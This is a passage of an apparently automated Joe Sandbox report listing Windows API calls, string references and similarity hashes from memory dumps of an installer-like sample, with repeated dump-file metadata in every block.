                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                              • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                              • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                              • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                              • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                                                                              • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                              • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 00401CC5
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CD2
                                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                                                                              • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                              • Opcode Fuzzy Hash: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                                                                              • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                              • wsprintfA.USER32 ref: 004045FE
                                                                                              • SetDlgItemTextA.USER32(?,00420478), ref: 00404611
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                              • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                              • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                              • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                              APIs
                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                              • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                              • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                              • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                              • Error launching installer, xrefs: 00405250
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                              • API String ID: 3712363035-1560902751
                                                                                              • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                              • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                              • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                              • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                              • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-297319885
                                                                                              • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                              • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                              • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                              • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2987980305-0
                                                                                              • Opcode ID: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                                                                              • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                              • Opcode Fuzzy Hash: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                                                                              • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                              APIs
                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                              • lstrlenA.KERNEL32(0040A350,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                                                                              • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                              • Opcode Fuzzy Hash: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                                                                              • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                              • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1404258612-0
                                                                                              • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                              • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                                                                              • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                              • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                              • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                                              • String ID:
                                                                                              • API String ID: 3272661963-0
                                                                                              • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                              • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                              • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                              • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                              • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
